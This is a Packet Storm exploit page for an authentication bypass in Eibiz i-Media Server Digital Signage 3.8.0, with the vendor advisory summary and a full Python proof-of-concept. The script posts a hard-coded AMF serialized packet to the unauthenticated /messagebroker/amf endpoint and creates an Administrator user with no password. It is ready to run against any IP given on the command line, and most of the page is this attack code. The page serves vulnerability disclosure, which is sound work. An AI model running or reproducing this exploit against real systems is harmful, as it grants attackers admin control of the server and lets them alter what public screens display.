exploit the possibilities

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass
Posted Aug 21, 2020
Authored by LiquidWorm | Site zeroscience.mk

Eibiz i-Media Server Digital Signage version 3.8.0 suffers from unauthenticated privilege escalation and arbitrary user creation vulnerability that allows authentication bypass. Once serialized, an AMF encoded object graph may be used to persist and retrieve application state or allow two endpoints to communicate through the exchange of strongly typed data. These objects are received by the server without validation and authentication and gives the attacker the ability to create any user with any role and bypass the security control in place and modify presented data on the screen/billboard.

tags | exploit, arbitrary
MD5 | fd7bb44dd6320c3825c09283301d799e

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:

def __init__(self):
self.ep = "/messagebroker/amf"
self.agent = "CharlieChaplin"
self.amfpacket = None
self.bytecount = None
self.bytesdata = None
self.address = None
self.headers = None
self.usrname = None
self.ende = None

def usage(self):
if len(sys.argv) != 3:
self.me()
msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
brd = "-" * len(msg + "\x20")
print("\n" + brd)
print(msg)
print("\x20Usage: ./i-media.py [ip] [username]")
print(brd)
exit(12)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
if not "http" in self.address:
self.address = "http://{}".format(self.address)

def amf(self):
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}

self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x01\x06" ##################"
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.amfpacket += "".join(map(chr, self.bytesdata))
self.amfpacket += (bytes(self.usrname.encode("utf-8")))
self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"

print("\n--Sending serialized object...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
go.sleep(2)
print("--Replaying...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
print
print("-" * len(self.ende))
print(self.ende)
print("-" * len(self.ende))

def me(self):
cc = """

/`,.,,,.
:.......,,
,.........7
,.........$
......:=+=$
I.....,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N......,..$=77:+?=~8
:......,::=.I8?:+=.=+~++
=.......,:+$=+O:+==~~++++=
8...........~7D$::~..~====:++
I.............:+.....~~~=~:~+?
N,............. .+...,:~=+~~ :+=$
;....... ......, .,....,:=+:,..~=?
Z,,...... :............,::~~=...===I
=.......$ Z...... =~,,,,.,:~,...,7~=
+....... 8.....,.=~~~:.~~~=:~ ..:$==
,...... +,..,,:.=~:~+I:,+I=8:...=?~
,....., =...,,,8+=,:~=~I=~~ N...:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8...... ,...7=Z$DN:?::=I~~$ =..,=+
...,..D ,....O88D,8D,:=:==+?? ...,:7
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
......8D .. .... :?~8D:.:~~=++ ..,~II
:....~D+: . . . ..,..==~===N +,.,=$
,. DDND.......... .,...,===+=N ..,+?Z
DD 88 .......... ....,..~+=~N ..,~?I
....... ,,.,,.:...=?? 8..~=I$
....... ...,,,,. ,:~= ..:=~?
........ ,.,,..,:.. I.:+?+D
....... .......,:,,8 ,..IN
........ .,.. ..,,:.: :8N
........ ... ..,::,, I+O
........ ......,:,. O.ZN
........ . . ...,,,,. D+
............ ....,,,. =
....... . ....,,, ?
....... .....,,, 7
...... . ..,,,, +
:..... ..,.,, 8
:....... =. .....,,,N 8
~....... D. .....,,,D 8
~....... D. . ...,,,O D
=.... .....,,Z ?`
+...... . :........,.$ +
I...... ........,.7 =
Z........ . . ....,,7 D
N..... ... . ........I 8
..... ... , ........I 8
...... . = .. .....I 7
:.. . ..7 8... .....I ?
Z.. D .. ....7 N NND88OOOOOOO88DN
O.. . .. ....O O D8OZ$77II777$$ZO8DN
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
... .?, I777IIIIIIIII7$~O8N NNNNN
8.... .I. ...7IIIIII7$Z8DD NNNNN
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN
?,:..:,.=N I.....,,=I+ N8
~....,8

"""

j = 0
while j < len(cc):
char = cc[j]
sys.stdout.write(char)
go.sleep(10.0 / 100000.0)
j = j + 1

def main(self):
self.usage()
self.amf()

if __name__ == '__main__':
__CreateAdmin__().main()
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close